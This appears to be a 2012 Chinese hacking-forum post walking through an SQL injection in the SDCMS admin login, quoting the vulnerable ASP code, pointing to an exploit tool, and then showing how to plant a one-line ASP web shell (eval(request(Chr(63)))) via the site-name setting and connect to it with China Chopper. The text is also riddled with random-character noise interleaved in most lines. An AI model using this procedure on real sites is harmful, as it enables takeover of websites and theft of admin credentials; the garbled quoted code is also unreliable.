作者:T00LS 鬼哥 g3 W- n2 A( O7 N. Z
漏洞文件:后台目录/index.asp
0 A1 b; b$ Q+ V# r* U
0 M: C1 ~' h* M, j7 I; Y& OSub Check
; ?! T5 n; t: h# k$ V Dim username,password,code,getcode,Rs
1 U6 j2 s1 s6 ]1 x% |( A: a0 ] IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub, J( G# m0 ? `3 E5 t3 ~
username=FilterText(Trim(Request.Form("username")),1)( G3 s+ g1 v- n% m6 h$ J! r9 W
password=FilterText(Trim(Request.Form("password")),1)
/ n, U0 w: t* C- F; h, t0 v5 l code=Trim(Request.Form("yzm"))
2 S j8 m& ~) O4 ~4 ? getcode=Session("SDCMSCode")
5 u: W3 H( X% g. K" ]5 f IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died \- c6 \9 K- F0 V
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied9 M- j. J, T1 U$ P
IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied
! N/ o" s2 y5 C/ y6 c IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied
2 N8 y* g. G/ m IF username="" or password="" Then
5 O( C1 f. } V# \8 r Echo "用户名或密码不能为空"ied
. v% ^; F% J, H& _ Else
, z+ Z F- S7 Q5 b Q' Q, b Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")6 K; w( n8 t% h" ~! e
IF Rs.Eof Then2 s8 G9 `' J9 h0 F' w% J
AddLog username,GetIp,"登录失败",1
% n4 D. Z7 b( g$ }# H* L Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
# { A4 S6 x$ L2 j% b Else' E f, T; n0 c. i2 m
Add_Cookies "sdcms_id",Rs(0)
' `+ ?% i0 ^# n( o6 \ Add_Cookies "sdcms_name",username
# J. w+ i5 L3 ^0 l7 ^& P' ], {" B Add_Cookies "sdcms_pwd",Rs(2)9 f! C2 E( [" w* m
Add_Cookies "sdcms_admin",Rs(3)
0 X, X! K% o: z1 Z( s5 y; @1 z Add_Cookies "sdcms_alllever",Rs(4)
- B/ S; M e) Z% H Add_Cookies "sdcms_infolever",Rs(5)9 b" G3 W- D- A7 s* C1 H( L" ?( t
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
0 P0 d, b D" k$ K" v0 M( k AddLog username,GetIp,"登录成功",1
* I/ ]: D4 Y6 w) a$ b9 m1 U3 ~ '自动删除30天前的Log记录: b: @$ w: U5 A: m
IF Sdcms_DataType Then$ P5 K+ R, g8 i* z9 A
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30"), ^. i8 ^5 d. N2 R& W: d$ u
Else
- Z5 w4 }7 Q' I Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
4 u9 x' e7 ]$ K8 i8 s. g End IF4 x+ L. [& N2 b% \- @8 l$ F
Go("sdcms_index.asp")
+ x7 L" Q8 K$ c- ?' h6 s7 } End IF
8 R) }! r6 H8 a Rs.Close
3 l! y4 i) T% Q4 C Set Rs=Nothing
7 x8 e5 k+ g; D. C9 ^ End IF
* w$ Y, a, ?6 W5 C* f! REnd Sub1 A, H. O0 v( p( h& w
# L) g [- o0 n- C1 I+ x8 N’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
/ t% i5 r7 [8 k& \2 ~$ e- g4 D* H- X w8 b% t* V
Function FilterText(ByVal t0,ByVal t1)
- o D$ [# M8 {, q IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function$ }( |2 u! y# |- _( z( _% p; ^
t0=Trim(t0)- p: M' Z* Z( c- O1 R' `+ b
Select Case t14 b3 L" U! y, {! Q; \* ~
Case "1"( |! D0 w8 {. b% s9 i
t0=Replace(t0,Chr(32),"")
% B) i: ^, {% k2 w$ E- t9 f t0=Replace(t0,Chr(13),"")
9 X( g$ {2 n$ ^- Y, p( g t0=Replace(t0,Chr(10)&Chr(10),"")5 K! {, Q3 H4 O/ Q5 [8 _
t0=Replace(t0,Chr(10),"")
- n, D' }. O5 u" p- U/ |: { Case "2"
1 T7 G% p1 L9 @+ _6 ] t0=Replace(t0,Chr(8),"")'回格
9 _8 a0 G: I6 g9 E- g t0=Replace(t0,Chr(9),"")'tab(水平制表符)
% z, w- \$ n) h; ~8 a t0=Replace(t0,Chr(10),"")'换行
" n: C( T+ ?% I4 u t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
7 G. w5 K1 B6 S3 v) l t0=Replace(t0,Chr(12),"")'换页
- U1 h. l% A* q: M: [. | t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合- K! b Q6 f" k0 L, ?1 n
t0=Replace(t0,Chr(22),"")
7 _; d( a5 g* j$ A7 K# _* v2 m t0=Replace(t0,Chr(32),"")'空格 SPACE$ f; K7 I" M) i2 H
t0=Replace(t0,Chr(33),"")'!
7 X! f* u7 h# B7 C1 c t0=Replace(t0,Chr(34),"")'": r# w- S) O @) U9 {3 z
t0=Replace(t0,Chr(35),"")'#+ y- D/ h- \6 f
t0=Replace(t0,Chr(36),"")'$
1 m- L% s" c8 D" s+ X. s! \3 t t0=Replace(t0,Chr(37),"")'%
; F3 B2 H6 h Y/ g- h) a" z t0=Replace(t0,Chr(38),"")'&8 [& L x4 p6 F1 E, k2 W0 M+ {
t0=Replace(t0,Chr(39),"")''
, e" @8 Y# a+ b" _ t0=Replace(t0,Chr(40),"")'(
8 t; P4 o. [% c' f t0=Replace(t0,Chr(41),"")')
% A" P) q' l# m- Q# b* S+ H, W t0=Replace(t0,Chr(42),"")'*
8 Z* }( k6 k" A. M/ A T t0=Replace(t0,Chr(43),"")'+6 n, U- n: Z: H9 S2 ~; Z/ E
t0=Replace(t0,Chr(44),"")',
1 a6 o& d: z3 }5 B3 O9 ^ t0=Replace(t0,Chr(45),"")'-
9 g" y, ^6 o/ b$ ?+ c0 L$ V9 w t0=Replace(t0,Chr(46),"")'.$ o. v) |" [9 N
t0=Replace(t0,Chr(47),"")'/. E# C: V0 {! W0 D1 U9 q! k
t0=Replace(t0,Chr(58),"")':
) Z) v3 J6 t8 b9 d t0=Replace(t0,Chr(59),"")';
* v% I F" `' [' s( q7 J. A6 Z t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>0 z, ^) n; S( R7 ]9 a$ |4 n5 i
t0=Replace(t0,Chr(63),"")'?
1 s7 A* I+ ]! ]. R p0 a t0=Replace(t0,Chr(64),"")'@
7 w5 \, {. z* V9 y; y' r# q' T t0=Replace(t0,Chr(91),"")'\
9 B. p, e- o l3 w# x t0=Replace(t0,Chr(92),"")'\
: M! Q( O1 v- r2 H2 R! e5 N t0=Replace(t0,Chr(93),"")']
; b7 z) j- B" b/ `- ` t0=Replace(t0,Chr(94),"")'^
? i: ` S8 a$ @& }) | t0=Replace(t0,Chr(95),"")'_3 f# f% m/ l% ~' M( U8 H6 f
t0=Replace(t0,Chr(96),"")'`/ F6 O; ?+ L$ \ `4 W& @3 X0 l
t0=Replace(t0,Chr(123),"")'{
' l6 u' R, i" t4 k$ z t0=Replace(t0,Chr(124),"")'|
# q+ ^- K8 \7 u t0=Replace(t0,Chr(125),"")'}
. ]: j& E8 ]+ t, b0 }( V( T1 c t0=Replace(t0,Chr(126),"")'~
- x1 f7 ^2 @( ~) F Case Else
2 ^% D$ u( w! U, `7 S* y7 l t0=Replace(t0, "&", "&")
8 n+ }- ?% A( c4 ~6 m/ d t0=Replace(t0, "'", "'")
3 e4 k! `; D, A, m6 o% k t0=Replace(t0, """", """)6 i0 t& [7 D9 H1 n) E/ u: k$ y3 [
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")/ |$ q) P! k G9 e
End Select
# B3 p3 j. C3 A; k# G( } IF Instr(Lcase(t0),"expression")>0 Then2 p0 R* c/ P# @# |& A
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
. e6 @$ d- @1 e I5 x9 ` End If! y/ G/ K% _- s x( Z+ A
FilterText=t04 Q0 r+ i8 u: e- a
End Function
* @: U" k, J% S& L& p7 b" {" r1 o; A# p; d- W0 l& q6 R& t0 S
看到没。直接参数是1 只过滤$ U( v5 N7 y1 p4 H
t0=Replace(t0,Chr(32)," ")
: U" a( C# B- l% H* J# y8 x/ c t0=Replace(t0,Chr(13),"")
+ H3 s) o" d- W7 t# ^5 Z7 L t0=Replace(t0,Chr(10)&Chr(10),"
5 X; \1 Q0 c6 f( U0 O8 {, Y")1 I; P# n& l9 i1 }9 }
t0=Replace(t0,Chr(10),"
- o$ C; c! ~6 F")8 o: Y! M3 V+ w) P% c$ A$ ]
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
* n: K: Y5 ~" r; _, kEXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
- s" R0 W# L# |- t. k! U. r" g
8 D* Q' Q' o% J- x测试:! Z! F# \- e& G& d+ A
& n4 U0 c' _( ] J7 S4 k
* T# r! @7 B8 X* J! u+ L
现在输入工具上验证码,然后点OK& q) z1 ~$ G& i8 o) \3 I: F; U3 o
2 C. S( a& B8 J7 S+ U: y9 L0 ?( q' I. y- _
看到我们直接进入后台管理界面了,呵呵!0 s! y% @$ h) S2 i+ s
6 Z/ z& O# i# V7 B/ j
0 f- X0 @! |6 T7 b F& n }: x
% V! \ a5 q; p, e1 d9 N$ U这样直接进入后台了。。。。
3 A4 @6 k( ?8 @) }, u4 N' h, M5 e( l% l* O4 m' I, b% ]
3 x. {3 I8 G7 P4 K% O$ A: _; {. r. I- ]" D! k4 A3 L
SDCMS提权:" F# y) i* S6 z4 d! u
8 O" }6 ?& Z: A* \
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
/ i6 d. G2 E( o v7 W- E: U' T
& @2 T2 H; [4 v& C; X/ W0 `
2 {0 \( V& m" h5 t0 ^* m7 ?' M) b6 y4 U* q0 X1 R( O5 ^
OK,现在用菜刀连接下!, B+ \8 ?* B0 Z2 a! B! T. W
) e' g3 }7 z* q+ X$ k P
' O( l& g* b. E1 `( u U4 [0 `- I
* G+ N* S& C& s+ e. L
P5 }2 U- U q" k9 y7 ^2 l0 [4 V+ `4 _
|
发表于 2012-11-9 20:57:02
收藏
支持
反对